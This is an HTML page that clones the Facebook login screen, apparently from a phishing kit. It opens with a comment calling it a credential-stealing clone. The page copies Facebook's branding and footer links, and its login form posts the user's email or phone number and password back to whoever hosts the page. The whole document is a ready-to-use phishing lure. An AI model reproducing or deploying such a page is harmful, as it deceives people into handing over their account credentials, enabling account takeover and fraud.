
<!--
                ~ DISCLAIMER ~
  This page constitutes a clone of the original site and
  in NO WAY is connected to the real one. If you see this
  message and you are not FULLY AWARE of what this
  page is, then someone is trying to STEAL YOUR CREDENTIALS.
  DO NOT PUT ANY PERSONAL INFORMATION ANYWHERE.

  IF YOU HAVEN'T PUT ANY PERSONAL INFORMATION DO NOT WORRY.
  CLOSE THIS PAGE AND REPORT THE PERSON THAT SENT YOU THE LINK.

  ~ THE ORIGINAL AUTHOR OF THIS APP HAS NOTHING TO DO WITH ANY MISUSE ~
-->

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook</title>
    <link rel="preconnect" href="https://fonts.gstatic.com">
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600;700&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="static/facebook/face.css">
</head>

<body>
    <main>
        <div class="row">
            <div class="col-logo">
                <img src="static/facebook/fb_logo.svg" alt="Logo">
                <h2>Facebook helps you connect and share with the people in your life.</h2>
            </div>
            <div class="col-form">
                <div class="form-container">
                    <form method="post">
                      <input type="text" placeholder="Email address or phone number" name="name">
                      <input type="password" placeholder="Password" name="password">
                      <button class="btn-login" type="submit" href="https://www.facebook.com/" name="login_btn">Login</button>
                      <a href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0">Forgotten password?</a>
                      <button class="btn-new">Create new Account</button>
                    <form>
                </div>
                <p><a href="#"><b>Create a Page</b></a> for a celebrity, brand or business.</p>
            </div>
        </div>
    </main>
    <footer>
        <div class="footer-contents">
            <ol>
                <li>English (UK)</li>
                <li><a href="https://sq-al.facebook.com/">Shqip</a></li>
                <li><a href="https://tr-tr.facebook.com/">Türkçe</a></li>
                <li><a href="https://bg-bg.facebook.com/">Български</a></li>
                <li><a href="https://el-gr.facebook.com/">Ελληνικά</a></li>
                <li><a href="https://ro-ro.facebook.com/">Română</a></li>
                <li><a href="https://de-de.facebook.com/">Deutsch</a></li>
                <li><a href="https://ru-ru.facebook.com/">Русский</a></li>
                <li><a href="https://es-la.facebook.com/">Español</a></li>
                <li><a href="https://pt-br.facebook.com/">Português (Brasil)</a></li>
                <li><a href="https://fr-fr.facebook.com/">Français (France)</a></li>
            </ol>

            <ol>
                <li><a href="https://en-gb.facebook.com/reg/">Sign Up</a></li>
                <li><a href="https://en-gb.facebook.com/login/">Log In </a></li>
                <li><a href="https://www.messenger.com/">Messenger</a></li>
                <li><a href="https://en-gb.facebook.com/lite/">Facebook Lite</a></li>
                <li><a href="https://en-gb.facebook.com/watch/">Watch</a></li>
                <li><a href="https://en-gb.facebook.com/biz/directory/">Services</a></li>
                <li><a href="https://about.facebook.com/">About</a></li>
                <li><a href="https://en-gb.facebook.com/login.php?next=https%3A%2F%2Fen-gb.facebook.com%2Fads%2Fcreate%2F%3Fnav_source%3Dunknown%26campaign_id%3D402047449186%26placement%3Dpflo%26extra_1%3Dnot-admgr-user">Create ad</a></li>
                <li><a href="https://en-gb.facebook.com/places/">Places</a></li>
                <li><a href="https://en-gb.facebook.com/games/">Games</a></li>
                <li><a href="https://pay.facebook.com/">Facebook Play</a></li>
                <li><a href="https://en-gb.facebook.com/login/?next=%2Fmarketplace%2F">Marketplace</a></li>
                <li><a href="https://www.facebook.com/">Facebook</a></li>
                <li><a href="https://en-gb.facebook.com/groups/explore/">Groups</a></li>
                <li><a href="https://en-gb.facebook.com/careers/?ref=pf">Jobs</a></li>
                <li><a href="https://store.facebook.com/quest/?utm_source=en-gb.facebook.com&utm_medium=oculusredirect">Oculus</a></li>
                <li><a href="https://en-gb.facebook.com/fundraisers/">Fundraises</a></li>
                <li><a href="https://www.messenger.com/">Messenger</a></li>
                <li><a href="https://en-gb.facebook.com/watch/">Watch</a></li>
                <li><a href="https://en-gb.facebook.com/privacy/policy/?entry_point=data_policy_redirect&entry=0">Privacy</a></li>
                <li><a href="https://en-gb.facebook.com/policies/cookies/">Cookies</a></li>
                <li><a href="https://www.facebook.com/help/222732947737668">Page categories</a></li>
                <li><a href="https://www.facebook.com/places/">Places</a></li>
                <li><a href="https://en-gb.facebook.com/games/">Games</a></li>
                <li><a href="https://www.facebook.com/business/a/facebook-locations">Locations</a></li>
                <li><a href="https://www.facebook.com/login/?next=%2Fmarketplace%2F">Marketplace</a></li>
                <li><a href="#">Facebook</a></li>
                <li><a href="https://www.bulletin.com/">Bulletin</a></li>
                <li><a href="https://en-gb.facebook.com/careers/?ref=pf">Jobs</a></li>
                <li><a href="https://store.facebook.com/portal/?utm_source=en-gb.facebook.com&utm_medium=portalredirect">Portal</a></li>
                <li><a href="https://www.instagram.com/">Instagram</a></li>
                <li><a href="https://en-gb.facebook.com/local/lists/245019872666104/">Local</a></li>
            </ol>
            <small>Meta © 2022</small>
        </div>
    </footer>
</body>

</html>
